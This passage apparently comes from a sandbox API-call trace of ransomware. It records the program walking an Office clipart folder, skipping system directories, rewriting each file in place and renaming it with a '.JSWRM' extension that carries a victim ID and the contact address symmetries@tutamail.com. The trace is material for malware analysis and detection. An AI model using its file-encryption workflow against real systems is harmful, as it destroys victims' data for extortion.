dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.964] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=2900) returned 1 [0080.964] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.964] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb50) returned 0x23fc98 [0080.964] ReadFile (in: hFile=0x314, lpBuffer=0x23fc98, nNumberOfBytesToRead=0xb50, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesRead=0x345e89c*=0xb50, lpOverlapped=0x0) returned 1 [0080.965] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.965] WriteFile (in: hFile=0x314, lpBuffer=0x23fc98*, nNumberOfBytesToWrite=0xb50, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x23fc98*, lpNumberOfBytesWritten=0x345e898*=0xb50, lpOverlapped=0x0) returned 1 [0080.965] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23fc98 | out: hHeap=0x1e0000) returned 1 [0080.965] CloseHandle (hObject=0x314) returned 1 [0080.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210ad8 [0080.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0080.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0080.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0080.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3f0 [0080.966] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3f0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3f0 | out: hHeap=0x1e0000) returned 1 [0080.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d338 [0080.966] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0080.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d338 | out: hHeap=0x1e0000) returned 1 [0080.966] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0080.966] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105336.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105336.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105336.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105336.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0080.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210ad8 | out: hHeap=0x1e0000) returned 1 [0080.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x20ff90 | out: hHeap=0x1e0000) returned 1 [0080.967] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe62b2d5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe62b2d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe651537, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x2d40, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105338.WMF", cAlternateFileName="")) returned 1 [0080.967] lstrcmpiW (lpString1="J0105338.WMF", lpString2=".") returned 1 [0080.967] lstrcmpiW (lpString1="J0105338.WMF", lpString2="..") returned 1 [0080.967] lstrcmpiW (lpString1="J0105338.WMF", lpString2="...") returned 1 [0080.967] lstrcmpiW (lpString1="J0105338.WMF", lpString2="windows") returned -1 [0080.967] lstrcmpiW (lpString1="J0105338.WMF", lpString2="recovery") returned -1 [0080.967] lstrcmpiW (lpString1="J0105338.WMF", lpString2="perflogs") returned -1 [0080.967] lstrcmpiW (lpString1="J0105338.WMF", lpString2="documents and settings") returned 1 [0080.967] lstrcmpiW (lpString1="J0105338.WMF", lpString2="$RECYCLE.BIN") returned 1 [0080.967] lstrcmpiW (lpString1="J0105338.WMF", lpString2="system volume information") returned -1 [0080.967] lstrcmpiW (lpString1="J0105338.WMF", lpString2="msocache") returned -1 [0080.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f70 [0080.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105338.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105338.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105338.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f70 | out: hHeap=0x1e0000) returned 1 [0080.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0080.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105338.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105338.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105338.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0080.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210028 [0080.967] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2104e8 | out: hHeap=0x1e0000) returned 1 [0080.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.967] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.967] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0080.967] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105338.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105338.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.968] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=11584) returned 1 [0080.968] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.968] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2d40) returned 0x24d210 [0080.968] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2d40, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2d40, lpOverlapped=0x0) returned 1 [0080.970] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.970] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2d40, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2d40, lpOverlapped=0x0) returned 1 [0080.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0080.970] CloseHandle (hObject=0x314) returned 1 [0080.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0080.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0080.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0080.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0080.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0080.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0080.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0080.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a2d0 [0080.970] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a2d0, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0080.970] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a2d0 | out: hHeap=0x1e0000) returned 1 [0080.970] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d3e0 [0080.971] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x2474b8 [0080.971] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d3e0 | out: hHeap=0x1e0000) returned 1 [0080.971] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0080.971] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105338.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105338.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105338.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105338.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0080.971] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2474b8 | out: hHeap=0x1e0000) returned 1 [0080.971] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210dd0 | out: hHeap=0x1e0000) returned 1 [0080.971] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0080.971] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe62b2d5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe62b2d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe651537, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x42a4, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105348.WMF", cAlternateFileName="")) returned 1 [0080.971] lstrcmpiW (lpString1="J0105348.WMF", lpString2=".") returned 1 [0080.971] lstrcmpiW (lpString1="J0105348.WMF", lpString2="..") returned 1 [0080.971] lstrcmpiW (lpString1="J0105348.WMF", lpString2="...") returned 1 [0080.971] lstrcmpiW (lpString1="J0105348.WMF", lpString2="windows") returned -1 [0080.971] lstrcmpiW (lpString1="J0105348.WMF", lpString2="recovery") returned -1 [0080.971] lstrcmpiW (lpString1="J0105348.WMF", lpString2="perflogs") returned -1 [0080.972] lstrcmpiW (lpString1="J0105348.WMF", lpString2="documents and settings") returned 1 [0080.972] lstrcmpiW (lpString1="J0105348.WMF", lpString2="$RECYCLE.BIN") returned 1 [0080.972] lstrcmpiW (lpString1="J0105348.WMF", lpString2="system volume information") returned -1 [0080.972] lstrcmpiW (lpString1="J0105348.WMF", lpString2="msocache") returned -1 [0080.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241038 [0080.972] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105348.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.972] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105348.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105348.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241038 | out: hHeap=0x1e0000) returned 1 [0080.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2413d0 [0080.972] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105348.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0080.972] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105348.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105348.WMF", lpUsedDefaultChar=0x0) returned 12 [0080.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2413d0 | out: hHeap=0x1e0000) returned 1 [0080.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210e68 [0080.972] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210028 | out: hHeap=0x1e0000) returned 1 [0080.972] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0080.972] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0080.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0080.972] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105348.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105348.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0080.972] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=17060) returned 1 [0080.972] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0080.972] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x42a0) returned 0x24d210 [0080.972] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x42a0, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x42a0, lpOverlapped=0x0) returned 1 [0081.049] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.049] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x42a0, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x42a0, lpOverlapped=0x0) returned 1 [0081.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0081.050] CloseHandle (hObject=0x314) returned 1 [0081.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210c08 [0081.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0081.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0081.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0081.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0081.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a3d8 [0081.050] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a3d8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0081.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a3d8 | out: hHeap=0x1e0000) returned 1 [0081.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23db18 [0081.050] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xee) returned 0x247a88 [0081.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23db18 | out: hHeap=0x1e0000) returned 1 [0081.050] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0081.050] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105348.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105348.wmf"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105348.WMF.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105348.wmf.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0081.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x247a88 | out: hHeap=0x1e0000) returned 1 [0081.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210c08 | out: hHeap=0x1e0000) returned 1 [0081.051] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2107e0 | out: hHeap=0x1e0000) returned 1 [0081.051] FindNextFileW (in: hFindFile=0x231b00, lpFindFileData=0x345e928 | out: lpFindFileData=0x345e928*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe62b2d5, ftCreationTime.dwHighDateTime=0x1d327e8, ftLastAccessTime.dwLowDateTime=0xe62b2d5, ftLastAccessTime.dwHighDateTime=0x1d327e8, ftLastWriteTime.dwLowDateTime=0xe651537, ftLastWriteTime.dwHighDateTime=0x1d327e8, nFileSizeHigh=0x0, nFileSizeLow=0x229c, dwReserved0=0x60002, dwReserved1=0x20924e, cFileName="J0105360.WMF", cAlternateFileName="")) returned 1 [0081.051] lstrcmpiW (lpString1="J0105360.WMF", lpString2=".") returned 1 [0081.051] lstrcmpiW (lpString1="J0105360.WMF", lpString2="..") returned 1 [0081.051] lstrcmpiW (lpString1="J0105360.WMF", lpString2="...") returned 1 [0081.051] lstrcmpiW (lpString1="J0105360.WMF", lpString2="windows") returned -1 [0081.051] lstrcmpiW (lpString1="J0105360.WMF", lpString2="recovery") returned -1 [0081.051] lstrcmpiW (lpString1="J0105360.WMF", lpString2="perflogs") returned -1 [0081.051] lstrcmpiW (lpString1="J0105360.WMF", lpString2="documents and settings") returned 1 [0081.051] lstrcmpiW (lpString1="J0105360.WMF", lpString2="$RECYCLE.BIN") returned 1 [0081.052] lstrcmpiW (lpString1="J0105360.WMF", lpString2="system volume information") returned -1 [0081.052] lstrcmpiW (lpString1="J0105360.WMF", lpString2="msocache") returned -1 [0081.052] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0081.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105360.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105360.WMF", cchWideChar=12, lpMultiByteStr=0x345ebd8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105360.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.052] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0081.052] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0081.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105360.WMF", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0081.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="J0105360.WMF", cchWideChar=12, lpMultiByteStr=0x345eba8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="J0105360.WMF", lpUsedDefaultChar=0x0) returned 12 [0081.052] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0081.052] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2109a8 [0081.052] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x210e68 | out: hHeap=0x1e0000) returned 1 [0081.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0081.052] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345e8fc, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0081.052] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x2107e0 [0081.052] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\J0105360.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\j0105360.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x314 [0081.052] GetFileSizeEx (in: hFile=0x314, lpFileSize=0x345e890 | out: lpFileSize=0x345e890*=8860) returned 1 [0081.053] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.053] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2290) returned 0x24d210 [0081.053] ReadFile (in: hFile=0x314, lpBuffer=0x24d210, nNumberOfBytesToRead=0x2290, lpNumberOfBytesRead=0x345e89c, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesRead=0x345e89c*=0x2290, lpOverlapped=0x0) returned 1 [0081.054] SetFilePointer (in: hFile=0x314, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0081.054] WriteFile (in: hFile=0x314, lpBuffer=0x24d210*, nNumberOfBytesToWrite=0x2290, lpNumberOfBytesWritten=0x345e898, lpOverlapped=0x0 | out: lpBuffer=0x24d210*, lpNumberOfBytesWritten=0x345e898*=0x2290, lpOverlapped=0x0) returned 1 [0081.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24d210 | out: hHeap=0x1e0000) returned 1 [0081.055] CloseHandle (hObject=0x314) returned 1 [0081.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x210dd0 [0081.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0081.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0081.055] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22cdc8, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0081.055] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0081.055] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0081.055] MultiByteToWideChar (in: 